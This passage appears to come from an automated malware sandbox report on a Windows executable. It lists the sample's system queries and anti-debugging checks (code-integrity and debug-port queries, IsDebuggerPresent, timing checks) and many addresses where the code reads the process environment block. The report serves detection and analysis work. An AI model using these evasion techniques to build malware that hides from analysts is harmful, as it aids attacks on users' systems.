Source: C:\Windows\SysWOW64\msiexec.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Code function: 0_2_726893F6 rdtsc

0_2_726893F6

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Code function: 0_2_7268A360 ZwAllocateVirtualMemory,LdrInitializeThunk,

0_2_7268A360

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Code function: 0_2_0040A8E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040A8E6

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

0_2_001D003C

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642260 mov ecx, dword ptr fs:[00000030h]	0_2_72642260
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642260 mov eax, dword ptr fs:[00000030h]	0_2_72642260
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645275 mov eax, dword ptr fs:[00000030h]	0_2_72645275
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645275 mov eax, dword ptr fs:[00000030h]	0_2_72645275
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645275 mov eax, dword ptr fs:[00000030h]	0_2_72645275
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645275 mov eax, dword ptr fs:[00000030h]	0_2_72645275
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645275 mov eax, dword ptr fs:[00000030h]	0_2_72645275
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271926E mov eax, dword ptr fs:[00000030h]	0_2_7271926E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C825D mov eax, dword ptr fs:[00000030h]	0_2_726C825D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701243 mov eax, dword ptr fs:[00000030h]	0_2_72701243
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267523D mov eax, dword ptr fs:[00000030h]	0_2_7267523D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267523D mov eax, dword ptr fs:[00000030h]	0_2_7267523D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267523D mov eax, dword ptr fs:[00000030h]	0_2_7267523D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267523D mov eax, dword ptr fs:[00000030h]	0_2_7267523D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267523D mov eax, dword ptr fs:[00000030h]	0_2_7267523D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267523D mov eax, dword ptr fs:[00000030h]	0_2_7267523D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72643200 mov eax, dword ptr fs:[00000030h]	0_2_72643200
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648209 mov eax, dword ptr fs:[00000030h]	0_2_72648209
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648209 mov eax, dword ptr fs:[00000030h]	0_2_72648209
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648209 mov eax, dword ptr fs:[00000030h]	0_2_72648209
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72716202 mov eax, dword ptr fs:[00000030h]	0_2_72716202
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72716202 mov eax, dword ptr fs:[00000030h]	0_2_72716202
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649210 mov eax, dword ptr fs:[00000030h]	0_2_72649210
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649210 mov eax, dword ptr fs:[00000030h]	0_2_72649210
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649210 mov eax, dword ptr fs:[00000030h]	0_2_72649210
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649210 mov eax, dword ptr fs:[00000030h]	0_2_72649210
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D2FE mov eax, dword ptr fs:[00000030h]	0_2_7267D2FE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D2FE mov eax, dword ptr fs:[00000030h]	0_2_7267D2FE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D2FE mov eax, dword ptr fs:[00000030h]	0_2_7267D2FE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726722C3 mov eax, dword ptr fs:[00000030h]	0_2_726722C3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726722C3 mov eax, dword ptr fs:[00000030h]	0_2_726722C3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726722C3 mov eax, dword ptr fs:[00000030h]	0_2_726722C3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726DB2C0 mov eax, dword ptr fs:[00000030h]	0_2_726DB2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726DB2C0 mov ecx, dword ptr fs:[00000030h]	0_2_726DB2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726DB2C0 mov eax, dword ptr fs:[00000030h]	0_2_726DB2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726DB2C0 mov eax, dword ptr fs:[00000030h]	0_2_726DB2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726DB2C0 mov eax, dword ptr fs:[00000030h]	0_2_726DB2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726DB2C0 mov eax, dword ptr fs:[00000030h]	0_2_726DB2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727012CA mov eax, dword ptr fs:[00000030h]	0_2_727012CA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266B2A0 mov eax, dword ptr fs:[00000030h]	0_2_7266B2A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726642B0 mov eax, dword ptr fs:[00000030h]	0_2_726642B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726642B0 mov eax, dword ptr fs:[00000030h]	0_2_726642B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726642B0 mov eax, dword ptr fs:[00000030h]	0_2_726642B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726642B0 mov eax, dword ptr fs:[00000030h]	0_2_726642B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726642B0 mov ecx, dword ptr fs:[00000030h]	0_2_726642B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C3284 mov eax, dword ptr fs:[00000030h]	0_2_726C3284
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C3284 mov eax, dword ptr fs:[00000030h]	0_2_726C3284
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267328D mov eax, dword ptr fs:[00000030h]	0_2_7267328D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267328D mov eax, dword ptr fs:[00000030h]	0_2_7267328D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267328D mov eax, dword ptr fs:[00000030h]	0_2_7267328D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267128B mov eax, dword ptr fs:[00000030h]	0_2_7267128B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267128B mov eax, dword ptr fs:[00000030h]	0_2_7267128B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267F289 mov eax, dword ptr fs:[00000030h]	0_2_7267F289
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268536C mov eax, dword ptr fs:[00000030h]	0_2_7268536C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268536C mov eax, dword ptr fs:[00000030h]	0_2_7268536C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266D36F mov eax, dword ptr fs:[00000030h]	0_2_7266D36F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270E362 mov eax, dword ptr fs:[00000030h]	0_2_7270E362
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265E370 mov eax, dword ptr fs:[00000030h]	0_2_7265E370
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265E370 mov eax, dword ptr fs:[00000030h]	0_2_7265E370
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265E370 mov eax, dword ptr fs:[00000030h]	0_2_7265E370
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265237A mov eax, dword ptr fs:[00000030h]	0_2_7265237A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265237A mov eax, dword ptr fs:[00000030h]	0_2_7265237A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701351 mov eax, dword ptr fs:[00000030h]	0_2_72701351
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72718356 mov eax, dword ptr fs:[00000030h]	0_2_72718356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671356 mov eax, dword ptr fs:[00000030h]	0_2_72671356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671356 mov eax, dword ptr fs:[00000030h]	0_2_72671356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671356 mov eax, dword ptr fs:[00000030h]	0_2_72671356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671356 mov eax, dword ptr fs:[00000030h]	0_2_72671356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671356 mov eax, dword ptr fs:[00000030h]	0_2_72671356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671356 mov eax, dword ptr fs:[00000030h]	0_2_72671356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671356 mov eax, dword ptr fs:[00000030h]	0_2_72671356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267B320 mov eax, dword ptr fs:[00000030h]	0_2_7267B320
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264E328 mov eax, dword ptr fs:[00000030h]	0_2_7264E328
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264E328 mov eax, dword ptr fs:[00000030h]	0_2_7264E328
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264C330 mov eax, dword ptr fs:[00000030h]	0_2_7264C330
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264C330 mov eax, dword ptr fs:[00000030h]	0_2_7264C330
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264C330 mov eax, dword ptr fs:[00000030h]	0_2_7264C330
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C308 mov eax, dword ptr fs:[00000030h]	0_2_7266C308
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C308 mov eax, dword ptr fs:[00000030h]	0_2_7266C308
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A314 mov eax, dword ptr fs:[00000030h]	0_2_7266A314
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A314 mov eax, dword ptr fs:[00000030h]	0_2_7266A314
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A314 mov eax, dword ptr fs:[00000030h]	0_2_7266A314
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A314 mov eax, dword ptr fs:[00000030h]	0_2_7266A314
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A314 mov eax, dword ptr fs:[00000030h]	0_2_7266A314
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A314 mov eax, dword ptr fs:[00000030h]	0_2_7266A314
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A314 mov eax, dword ptr fs:[00000030h]	0_2_7266A314
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A314 mov eax, dword ptr fs:[00000030h]	0_2_7266A314
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650310 mov eax, dword ptr fs:[00000030h]	0_2_72650310
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650310 mov eax, dword ptr fs:[00000030h]	0_2_72650310
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650310 mov eax, dword ptr fs:[00000030h]	0_2_72650310
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650310 mov eax, dword ptr fs:[00000030h]	0_2_72650310
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650310 mov eax, dword ptr fs:[00000030h]	0_2_72650310
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650310 mov eax, dword ptr fs:[00000030h]	0_2_72650310
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264D319 mov eax, dword ptr fs:[00000030h]	0_2_7264D319
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264F3E0 mov eax, dword ptr fs:[00000030h]	0_2_7264F3E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264F3E0 mov eax, dword ptr fs:[00000030h]	0_2_7264F3E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264F3E0 mov eax, dword ptr fs:[00000030h]	0_2_7264F3E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726483E0 mov eax, dword ptr fs:[00000030h]	0_2_726483E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726893F6 mov eax, dword ptr fs:[00000030h]	0_2_726893F6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726893F6 mov eax, dword ptr fs:[00000030h]	0_2_726893F6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726893F6 mov eax, dword ptr fs:[00000030h]	0_2_726893F6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726893F6 mov eax, dword ptr fs:[00000030h]	0_2_726893F6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726893F6 mov eax, dword ptr fs:[00000030h]	0_2_726893F6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726893F6 mov eax, dword ptr fs:[00000030h]	0_2_726893F6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270B3D2 mov eax, dword ptr fs:[00000030h]	0_2_7270B3D2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov ecx, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov ecx, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov eax, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov ecx, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov ecx, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov eax, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov ecx, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov ecx, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov eax, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov ecx, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov ecx, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2 mov eax, dword ptr fs:[00000030h]	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727183D7 mov eax, dword ptr fs:[00000030h]	0_2_727183D7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727013D8 mov eax, dword ptr fs:[00000030h]	0_2_727013D8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D3AC mov eax, dword ptr fs:[00000030h]	0_2_7267D3AC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727043A4 mov eax, dword ptr fs:[00000030h]	0_2_727043A4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727043A4 mov eax, dword ptr fs:[00000030h]	0_2_727043A4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727043A4 mov eax, dword ptr fs:[00000030h]	0_2_727043A4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727043A4 mov eax, dword ptr fs:[00000030h]	0_2_727043A4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72686399 mov eax, dword ptr fs:[00000030h]	0_2_72686399
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72686399 mov eax, dword ptr fs:[00000030h]	0_2_72686399
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72686399 mov eax, dword ptr fs:[00000030h]	0_2_72686399
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266E067 mov eax, dword ptr fs:[00000030h]	0_2_7266E067
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266E067 mov eax, dword ptr fs:[00000030h]	0_2_7266E067
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701071 mov eax, dword ptr fs:[00000030h]	0_2_72701071
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72655066 mov eax, dword ptr fs:[00000030h]	0_2_72655066
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266F076 mov eax, dword ptr fs:[00000030h]	0_2_7266F076
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266F076 mov eax, dword ptr fs:[00000030h]	0_2_7266F076
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266F076 mov eax, dword ptr fs:[00000030h]	0_2_7266F076
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266F076 mov eax, dword ptr fs:[00000030h]	0_2_7266F076
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266F076 mov eax, dword ptr fs:[00000030h]	0_2_7266F076
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72662073 mov eax, dword ptr fs:[00000030h]	0_2_72662073
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650070 mov eax, dword ptr fs:[00000030h]	0_2_72650070
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650070 mov eax, dword ptr fs:[00000030h]	0_2_72650070
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FF074 mov eax, dword ptr fs:[00000030h]	0_2_726FF074
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671041 mov eax, dword ptr fs:[00000030h]	0_2_72671041
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C04A mov eax, dword ptr fs:[00000030h]	0_2_7266C04A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C04A mov eax, dword ptr fs:[00000030h]	0_2_7266C04A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D6042 mov eax, dword ptr fs:[00000030h]	0_2_726D6042
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265F050 mov eax, dword ptr fs:[00000030h]	0_2_7265F050
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265F050 mov eax, dword ptr fs:[00000030h]	0_2_7265F050
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72647025 mov eax, dword ptr fs:[00000030h]	0_2_72647025
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645020 mov eax, dword ptr fs:[00000030h]	0_2_72645020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645020 mov eax, dword ptr fs:[00000030h]	0_2_72645020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645020 mov eax, dword ptr fs:[00000030h]	0_2_72645020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650020 mov eax, dword ptr fs:[00000030h]	0_2_72650020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650020 mov eax, dword ptr fs:[00000030h]	0_2_72650020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650020 mov esi, dword ptr fs:[00000030h]	0_2_72650020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650020 mov eax, dword ptr fs:[00000030h]	0_2_72650020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650020 mov eax, dword ptr fs:[00000030h]	0_2_72650020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650020 mov eax, dword ptr fs:[00000030h]	0_2_72650020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650020 mov eax, dword ptr fs:[00000030h]	0_2_72650020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650020 mov eax, dword ptr fs:[00000030h]	0_2_72650020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C5023 mov eax, dword ptr fs:[00000030h]	0_2_726C5023
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C5023 mov eax, dword ptr fs:[00000030h]	0_2_726C5023
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C5023 mov eax, dword ptr fs:[00000030h]	0_2_726C5023
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C5023 mov eax, dword ptr fs:[00000030h]	0_2_726C5023
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C5023 mov eax, dword ptr fs:[00000030h]	0_2_726C5023
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C5023 mov eax, dword ptr fs:[00000030h]	0_2_726C5023
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C5023 mov eax, dword ptr fs:[00000030h]	0_2_726C5023
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C5023 mov eax, dword ptr fs:[00000030h]	0_2_726C5023
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C5023 mov eax, dword ptr fs:[00000030h]	0_2_726C5023
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72684030 mov eax, dword ptr fs:[00000030h]	0_2_72684030
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B010 mov eax, dword ptr fs:[00000030h]	0_2_7264B010
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701008 mov eax, dword ptr fs:[00000030h]	0_2_72701008
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A01A mov eax, dword ptr fs:[00000030h]	0_2_7265A01A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A01A mov eax, dword ptr fs:[00000030h]	0_2_7265A01A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A01A mov eax, dword ptr fs:[00000030h]	0_2_7265A01A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A01A mov eax, dword ptr fs:[00000030h]	0_2_7265A01A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727180F7 mov ecx, dword ptr fs:[00000030h]	0_2_727180F7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266E0E8 mov eax, dword ptr fs:[00000030h]	0_2_7266E0E8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726500FE mov eax, dword ptr fs:[00000030h]	0_2_726500FE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267A0F8 mov eax, dword ptr fs:[00000030h]	0_2_7267A0F8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726540CC mov eax, dword ptr fs:[00000030h]	0_2_726540CC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726540CC mov eax, dword ptr fs:[00000030h]	0_2_726540CC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726540CC mov eax, dword ptr fs:[00000030h]	0_2_726540CC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726490D0 mov eax, dword ptr fs:[00000030h]	0_2_726490D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726490D0 mov eax, dword ptr fs:[00000030h]	0_2_726490D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726490D0 mov eax, dword ptr fs:[00000030h]	0_2_726490D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727010CF mov eax, dword ptr fs:[00000030h]	0_2_727010CF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727050B3 mov eax, dword ptr fs:[00000030h]	0_2_727050B3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727050B3 mov eax, dword ptr fs:[00000030h]	0_2_727050B3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267A0A3 mov eax, dword ptr fs:[00000030h]	0_2_7267A0A3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267A0A3 mov eax, dword ptr fs:[00000030h]	0_2_7267A0A3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C40A7 mov eax, dword ptr fs:[00000030h]	0_2_726C40A7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72647090 mov eax, dword ptr fs:[00000030h]	0_2_72647090
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72647090 mov eax, dword ptr fs:[00000030h]	0_2_72647090
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648160 mov ecx, dword ptr fs:[00000030h]	0_2_72648160
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264516E mov eax, dword ptr fs:[00000030h]	0_2_7264516E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264516E mov ecx, dword ptr fs:[00000030h]	0_2_7264516E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267116C mov eax, dword ptr fs:[00000030h]	0_2_7267116C
